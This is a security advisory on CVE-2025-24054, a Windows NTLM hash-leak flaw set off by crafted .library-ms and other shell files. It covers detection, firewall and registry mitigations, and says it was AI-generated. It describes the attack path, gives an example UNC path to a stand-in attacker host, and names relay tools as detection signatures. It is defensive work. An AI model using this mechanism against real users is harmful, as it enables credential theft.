CVE-2025-24054 Overview
CVE-2025-24054 is a spoofing vulnerability in Microsoft Windows NTLM caused by external control of a file name or path [CWE-73]. An unauthenticated attacker can coerce a Windows host into sending NTLM authentication material to an attacker-controlled endpoint over the network. Successful exploitation discloses NTLMv2-SSP hashes that can be relayed or cracked offline to impersonate the victim user. The flaw affects every supported version of Windows client and Windows Server, including Windows 10, Windows 11 24H2, and Windows Server 2025. CISA has added CVE-2025-24054 to the Known Exploited Vulnerabilities catalog, confirming active exploitation in the wild.
Critical Impact
Minimal user interaction with a crafted file (such as browsing a folder containing a malicious .library-ms file) triggers outbound NTLM authentication, leaking the user's NTLMv2 hash to a remote SMB server controlled by the attacker.
Affected Products
- Microsoft Windows 10 (1507, 1607, 1809, 21H2, 22H2) and Windows 11 (22H2, 23H2, 24H2)
- Microsoft Windows Server 2008 R2 SP1, Server 2012/2012 R2, Server 2016, Server 2019
- Microsoft Windows Server 2022, Server 2022 23H2, and Server 2025
Discovery Timeline
- 2025-03-11 - CVE-2025-24054 published to NVD by Microsoft as part of the March 2025 Patch Tuesday cycle
- 2025-04 - Public proof-of-concept exploits posted to the Full Disclosure mailing list and Exploit-DB (entries 52478 and 52480)
- 2026-02-13 - Last updated in NVD database
Technical Details for CVE-2025-24054
Vulnerability Analysis
The vulnerability resides in how Windows Explorer and related shell components parse files whose contents reference external network paths. Files such as .library-ms, .url, .lnk, and similar shell-handled formats accept UNC paths in fields the operating system resolves automatically. When the path points to a remote SMB share, the Windows NTLM client initiates authentication against the remote server before the user opens or executes the file. The attacker receives the resulting NTLMv2-SSP challenge/response, which encodes the victim's username, domain, and a hash of their password.
The attacker can then perform offline brute-force cracking against the hash or relay the authentication to another service (LDAP, SMB, HTTP) that accepts NTLM. Because the trigger is implicit file parsing rather than execution, traditional Mark-of-the-Web prompts and SmartScreen warnings are not displayed. The flaw is categorized as External Control of File Name or Path [CWE-73].
Root Cause
The shell handlers for several file types resolve attacker-supplied paths during enumeration, preview, or icon rendering. The resolution path does not validate or strip remote UNC targets, allowing an externally supplied value to drive NTLM authentication on behalf of the logged-in user.
Attack Vector
An attacker delivers a crafted file by email attachment, ZIP archive, shared network folder, or web download. The victim only needs to view the containing folder in Windows Explorer. Explorer parses the file metadata, follows the embedded UNC path (for example \\attacker.example.com\share\icon.ico), and Windows transmits NTLM credentials to the attacker's responder server. No double-click or execution is required.
The vulnerability mechanism is documented in the Microsoft Security Update Guide and demonstrated in the Full Disclosure post from April 2025 and Exploit-DB entry 52478.
Detection Methods for CVE-2025-24054
Indicators of Compromise
- Outbound SMB (TCP/445) or WebDAV (TCP/80/443) traffic from user workstations to untrusted external IP addresses or domains.
- Inbound delivery of archives containing .library-ms, .url, .lnk, .search-ms, or .website files with embedded UNC paths.
- Windows Security event ID 4624/4625 logon events showing NTLM authentication originating from anomalous source hosts.
- Responder, Inveigh, or ntlmrelayx tool signatures observed in network capture or proxy logs.
Detection Strategies
- Inspect email gateways and download proxies for archives containing shell metadata file types and quarantine those referencing external UNC paths.
- Hunt in endpoint telemetry for explorer.exe initiating SMB connections to public IP ranges, which is anomalous on managed endpoints.
- Correlate firewall egress logs with workstation source IPs to surface any TCP/445 traffic leaving the corporate perimeter.
Monitoring Recommendations
- Enable Windows Defender Firewall outbound rules to log SMB egress attempts and alert on matches.
- Forward NTLM auditing events (event IDs 8001-8004 from the NTLM operational log) to a SIEM for correlation.
- Track CISA KEV catalog updates via the CISA Known Exploited Vulnerabilities entry for related advisories.
How to Mitigate CVE-2025-24054
Immediate Actions Required
- Apply the March 2025 Microsoft security updates to all affected Windows client and Server SKUs without delay.
- Block outbound TCP/445, TCP/139, and unauthenticated WebDAV at the perimeter firewall to prevent NTLM hash exfiltration.
- Enforce SMB signing and Extended Protection for Authentication (EPA) on internal services to defeat NTLM relay.
- Identify and prioritize remediation for internet-facing or roaming endpoints that can reach arbitrary external SMB hosts.
Patch Information
Microsoft released patches addressing CVE-2025-24054 in the March 2025 cumulative update. Details and download links are available from the Microsoft Security Update Guide for CVE-2025-24054. A community-maintained mitigation script is published by Vicarius vSociety.
Workarounds
- Configure the Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers group policy to Deny all or Audit all and add explicit exceptions for required internal destinations.
- Disable NTLM authentication in favor of Kerberos where feasible, and remove legacy fallback paths.
- Use host firewall rules to restrict SMB client traffic so that explorer.exe cannot reach external networks on TCP/445.
# Example: block outbound SMB on Windows hosts via PowerShell
New-NetFirewallRule -DisplayName "Block Outbound SMB 445" `
-Direction Outbound `
-Action Block `
-Protocol TCP `
-RemotePort 445 `
-Profile Any
# Restrict outgoing NTLM to remote servers (audit first, then deny)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" `
/v RestrictSendingNTLMTraffic /t REG_DWORD /d 2 /f
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
